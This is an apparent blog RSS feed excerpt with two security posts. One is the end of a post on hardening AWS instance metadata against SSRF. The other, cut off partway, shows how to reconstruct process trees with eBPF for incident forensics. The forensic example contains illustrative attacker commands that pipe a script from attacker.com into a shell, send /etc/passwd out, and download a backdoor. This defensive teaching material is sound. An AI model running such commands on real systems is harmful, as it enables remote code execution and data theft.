<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Legacy AWS SDK versions that only support IMDSv1.</strong> Older releases of the AWS SDK for Java v1 (&lt; 1.11.678) and the AWS SDK for Python (boto3 &lt; 1.9.220) do not support IMDSv2 by default. Enforcing <code class="" data-line="">--http-tokens required</code> on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule <code class="" data-line="">ec2-imdsv2-check</code> flags non-compliant instances but does not check SDK versions — that inventory step is manual.</p>
<pre><code class="" data-line=""># Check boto3 version on an instance
python3 -c &quot;import boto3; print(boto3.__version__)&quot;
# Requires &gt;= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name &quot;aws-java-sdk-core-*.jar&quot; 2&gt;/dev/null | \
  while read jar; do
    unzip -p &quot;$jar&quot; META-INF/MANIFEST.MF 2&gt;/dev/null | grep &quot;Implementation-Version&quot;
  done
# AWS SDK for Java v1 &lt; 1.11.678 does not support IMDSv2 by default
</code></pre>
<p><strong>EKS node groups and hop limit 2.</strong> If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The default for managed node groups (created with <code class="" data-line="">aws eks create-nodegroup</code>) is hop limit 2 for this reason; you can reduce it once you&#8217;ve confirmed nothing breaks.</p>
<p><strong>GuardDuty&#8217;s 5–15 minute detection delay.</strong> <code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration</code> is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.</p>
<pre><code class="" data-line=""># EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty&#039;s delayed finding)
aws events put-rule \
  --name &quot;S3DataEventFromUnexpectedSource&quot; \
  --event-pattern &#039;{
    &quot;source&quot;: [&quot;aws.s3&quot;],
    &quot;detail-type&quot;: [&quot;AWS API Call via CloudTrail&quot;],
    &quot;detail&quot;: {
      &quot;eventSource&quot;: [&quot;s3.amazonaws.com&quot;],
      &quot;eventName&quot;: [&quot;GetObject&quot;],
      &quot;userIdentity&quot;: {
        &quot;sessionContext&quot;: {
          &quot;sessionIssuer&quot;: {
            &quot;userName&quot;: [&quot;MyApplicationRole&quot;]
          }
        }
      }
    }
  }&#039; \
  --state ENABLED
</code></pre>
<p><strong>Disabling the IMDS endpoint entirely.</strong> You can set <code class="" data-line="">--http-endpoint disabled</code> to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<h3 id="imdsv1-vs-imdsv2">IMDSv1 vs IMDSv2</h3>
<table>
<thead>
<tr>
<th>Attribute</th>
<th>IMDSv1</th>
<th>IMDSv2</th>
</tr>
</thead>
<tbody>
<tr>
<td>Authentication</td>
<td>None — any HTTP GET works</td>
<td>PUT to <code class="" data-line="">/latest/api/token</code> required first to obtain a session token</td>
</tr>
<tr>
<td>SSRF exploitable</td>
<td>Yes — one HTTP request returns credentials</td>
<td>No — SSRF cannot initiate a PUT before a GET in standard flows</td>
</tr>
<tr>
<td>Session token TTL</td>
<td>N/A</td>
<td>1 second to 21,600 seconds (configurable)</td>
</tr>
<tr>
<td>Hop limit enforcement</td>
<td>N/A</td>
<td>Enforced on the PUT response — hop limit 1 (IP TTL=1) blocks containers behind an extra network hop from reaching IMDS</td>
</tr>
<tr>
<td>AWS CLI enforcement</td>
<td><code class="" data-line="">--http-tokens optional</code> (default on old instances)</td>
<td><code class="" data-line="">--http-tokens required</code></td>
</tr>
<tr>
<td>Capital One risk</td>
<td>Present</td>
<td>Eliminated</td>
</tr>
</tbody>
</table>
<h3 id="imdsv2-enforcement-commands-by-provider">IMDSv2 Enforcement Commands by Provider</h3>
<table>
<thead>
<tr>
<th>Provider</th>
<th>Enforcement Command</th>
<th>Scope</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>AWS — running instance</strong></td>
<td><code class="" data-line="">aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1</code></td>
<td>Single instance</td>
</tr>
<tr>
<td><strong>AWS — launch template</strong></td>
<td>Add <code class="" data-line="">&quot;MetadataOptions&quot;: {&quot;HttpTokens&quot;: &quot;required&quot;}</code> to launch template data</td>
<td>All instances from template</td>
</tr>
<tr>
<td><strong>AWS — org SCP</strong></td>
<td>Deny <code class="" data-line="">ec2:RunInstances</code> where <code class="" data-line="">ec2:MetadataHttpTokens != required</code></td>
<td>All accounts in org</td>
</tr>
<tr>
<td><strong>AWS — Config rule</strong></td>
<td><code class="" data-line="">ec2-imdsv2-check</code> managed rule</td>
<td>Compliance audit</td>
</tr>
<tr>
<td><strong>GCP</strong></td>
<td>GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires <code class="" data-line="">Metadata-Flavor: Google</code> header — this header cannot be set via SSRF in most frameworks</td>
<td>N/A</td>
</tr>
<tr>
<td><strong>Azure</strong></td>
<td>Azure IMDS requires <code class="" data-line="">Metadata: true</code> header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)</td>
<td>N/A</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Note on GCP and Azure:</strong> Both providers designed their metadata services with SSRF resistance in mind. The <code class="" data-line="">Metadata-Flavor: Google</code> and <code class="" data-line="">Metadata: true</code> headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.</p>
</blockquote>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>IMDSv1 has no authentication</strong>: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required</li>
<li>The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale</li>
<li><code class="" data-line="">--http-tokens required</code> is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable</li>
<li>GuardDuty&#8217;s <code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration</code> finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting</li>
<li>The structural solution eliminates the credential entirely: <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity</a> on EKS/GKE means pods get scoped, short-lived tokens; the node&#8217;s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn&#8217;t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.</p>
<p>Get EP08 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&#038;title=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" data-a2a-url="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/" data-a2a-title="SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach"></a></p><p>The post <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1861</post-id>	</item>
		<item>
		<title>Process Lineage — Reconstructing What Happened After the Fact</title>
		<link>https://linuxcent.com/ebpf-process-lineage-incident-response/</link>
					<comments>https://linuxcent.com/ebpf-process-lineage-incident-response/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 18 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[kprobe]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Process Lineage]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1842</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Reconstruct the full process tree of a compromised container — what it spawned, what files it touched, what connections it made — using eBPF kprobe hooks. Even after the process exits.</p>
<p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel with a grey left accent bar. position:relative makes the
   block the positioning context for the absolutely positioned badge and copy button. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code: light chip background. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
/* Code nested in a pre block drops the inline chip styling and inherits the panel colours. */
pre code{background:transparent;padding:0;color:inherit}
/* Accent bar colour keyed on the data-lang attribute: shells, data/markup formats,
   programming languages, plain output. These must follow the pre rule to override its border colour. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned to the top-right corner, invisible until the block is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* State class for a button that has just copied successfully. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned to the top-left corner, uppercase, ignores pointer events, shown on hover. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: full width, collapsed borders, shaded header row, zebra-striped body rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
// Code-block enhancer: labels each pre element with its language and adds a Copy button.
(function(){
  // Run once per page, even if this script is included more than once.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // The language is read from a "language-xxx" class on the nested code element, when there is one.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=snippet(pre,code);
        // Prefer the async Clipboard API (secure contexts only); on absence or rejection use the legacy path.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Text to copy: the nested code element when present. Otherwise the pre content read from a
  // clone with the injected button and badge removed, so the "Copy" label is never part of the copied text.
  function snippet(pre,code){
    if(code)return code.innerText;
    var copy=pre.cloneNode(true);
    copy.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return copy.textContent;
  }
  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then restore the label.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Legacy fallback: copy through a temporary off-screen textarea and document.execCommand.
  function fb(text,btn){
    var ta=null;
    var copied=false;
    try{
      ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand signals an unsupported or disabled command by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    // Always detach the helper textarea, including when select or execCommand threw.
    finally{if(ta&&ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Enhance immediately when the DOM is already parsed; otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 13</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon</a> · <strong>Process Lineage</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img fetchpriority="high" decoding="async" width="2400" height="2012" src="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png" alt="eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics" class="wp-image-2122" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-300x252.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1024x858.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-768x644.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1536x1288.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-2048x1717.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp<br />
  <em>(kprobe on fork/exec = an eBPF program that fires every time the kernel&#8217;s <code class="" data-line="">fork()</code> or <code class="" data-line="">execve()</code> system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)</em></li>
<li>Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)</li>
<li>Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream</li>
<li>Reconstructing an incident from process lineage requires: who spawned the attacker&#8217;s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp</li>
<li>Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace</li>
</ul>
<hr />
<p>EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.</p>
<h2 id="quick-check-what-process-events-is-your-cluster-already-recording">Quick Check: What Process Events Is Your Cluster Already Recording?</h2>
<pre><code class="" data-line=""># On any cluster node — verify exec tracing is available
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-20s %-6d %s\n&quot;, comm, pid, str(args-&gt;filename));
}
// bpftrace has no --timeout option; end the trace from inside the program after 10 seconds
interval:s:10 { exit(); }&#039;

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
</code></pre>
<pre><code class="" data-line=""># If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process_exec&quot;: {
    &quot;process&quot;: {
      &quot;pid&quot;: 18293,
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;arguments&quot;: &quot;-c health-check.sh&quot;,
      &quot;start_time&quot;: &quot;2026-04-22T09:14:03.412Z&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;parent_pid&quot;: 18201
    },
    &quot;parent&quot;: {
      &quot;pid&quot;: 18201,
      &quot;binary&quot;: &quot;/usr/local/bin/my-app&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;}
    }
  }
}
</code></pre>
<p>Each event has the process, its parent, the pod, the namespace, and the full binary path. That&#8217;s the raw material for process lineage reconstruction.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.</p>
</blockquote>
<hr />
<p>A container in the <code class="" data-line="">payments</code> namespace was reported compromised. The security team&#8217;s automated response had already restarted the pod — the attacker&#8217;s process was gone. The container&#8217;s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.</p>
<p>Three questions, no answers yet:<br />
1. What spawned the attacker&#8217;s process? (was it a remote code execution in the app, or a misconfigured exec?)<br />
2. What did the attacker run after getting in? (what did they download, execute, touch?)<br />
3. What network connections did they make? (where did data go, if anywhere?)</p>
<p>The answers were in Tetragon&#8217;s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn&#8217;t touch that record.</p>
<p>The lineage showed:</p>
<pre><code class="" data-line="">my-app (PID 18201)
  └── sh -c &quot;curl http://attacker.com/payload.sh | sh&quot;  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              ├── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
              └── chmod +x /tmp/.x  (PID 18298)
</code></pre>
<p>Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.</p>
<hr />
<h2 id="how-the-kernel-tracks-process-identity">How the Kernel Tracks Process Identity</h2>
<p>Every process in Linux is represented by a <code class="" data-line="">task_struct</code> — the kernel&#8217;s internal data structure for a running process. It contains everything the kernel knows about that process.</p>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code></strong> — the kernel&#8217;s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent <code class="" data-line="">task_struct</code>. When bpftrace uses <code class="" data-line="">curtask</code>, it&#8217;s returning a pointer to the current process&#8217;s <code class="" data-line="">task_struct</code>. Reading <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> gives you the parent&#8217;s PID — the foundation of process lineage.</p>
</blockquote>
<p>When a process calls <code class="" data-line="">fork()</code>, the kernel:<br />
1. Allocates a new <code class="" data-line="">task_struct</code> for the child<br />
2. Copies the parent&#8217;s <code class="" data-line="">task_struct</code> fields into the child<br />
3. Sets the child&#8217;s <code class="" data-line="">real_parent</code> pointer to the parent&#8217;s <code class="" data-line="">task_struct</code><br />
4. Assigns the child a new PID<br />
5. Returns the child&#8217;s PID to the parent, and 0 to the child</p>
<p>When the child calls <code class="" data-line="">execve()</code>, the kernel:<br />
1. Validates the binary (permission and capability checks, LSM hooks)<br />
2. Replaces the process&#8217;s memory image with the new binary<br />
3. Updates <code class="" data-line="">task_struct-&gt;comm</code> with the new process name<br />
4. The PID does not change — <code class="" data-line="">execve</code> replaces the process image but not the process identity</p>
<p>This <code class="" data-line="">fork</code> → <code class="" data-line="">exec</code> sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.</p>
<hr />
<h2 id="building-the-process-tree-with-kprobes">Building the Process Tree with kprobes</h2>
<p>The two core hooks for process lineage:</p>
<pre><code class="" data-line=""># Every fork — capture parent/child relationship
bpftrace -e &#039;
tracepoint:syscalls:sys_exit_clone {
    // Tracepoint probes expose the syscall return value as args-&gt;ret
    // (the retval builtin is only for kretprobe/uretprobe/kfunc probes).
    // A positive value is the new child PID as seen by the parent.
    if (args-&gt;ret &gt; 0) {
        printf(&quot;FORK parent=%-6d child=%-6d parent_comm=%-20s\n&quot;,
               pid, args-&gt;ret, comm);
    }
}&#039;
</code></pre>
<pre><code class="" data-line=""># Every exec — capture what binary replaced the process image
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    // printf emits the fixed columns; join() then prints the whole argv array
    // followed by a newline. str(*args-&gt;argv) would only yield argv[0].
    printf(&quot;EXEC pid=%-6d ppid=%-6d binary=%-40s args=&quot;,
           pid,
           curtask-&gt;real_parent-&gt;tgid,
           str(args-&gt;filename));
    join(args-&gt;argv);
}&#039;
</code></pre>
<p>Combined output (30 seconds, simplified):</p>
<pre><code class="" data-line="">FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd
</code></pre>
<p>Each line is a kernel event. The parent/child PID chain is the tree. Rendered:</p>
<pre><code class="" data-line="">my-app (18201)
  └── sh (18293) — &quot;sh -c curl http://attacker.com/payload.sh | sh&quot;
        └── sh (18294) — &quot;sh payload.sh&quot;
              ├── cat (18295) — &quot;/etc/passwd&quot;
              └── curl (18296) — &quot;http://attacker.com/exfil -d @/etc/passwd&quot;
</code></pre>
<p>This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.</p>
<hr />
<h2 id="how-tetragon-stores-the-process-tree-in-bpf-maps">How Tetragon Stores the Process Tree in BPF Maps</h2>
<p>bpftrace&#8217;s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.</p>
<pre><code class="" data-line="">Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend
</code></pre>
<blockquote>
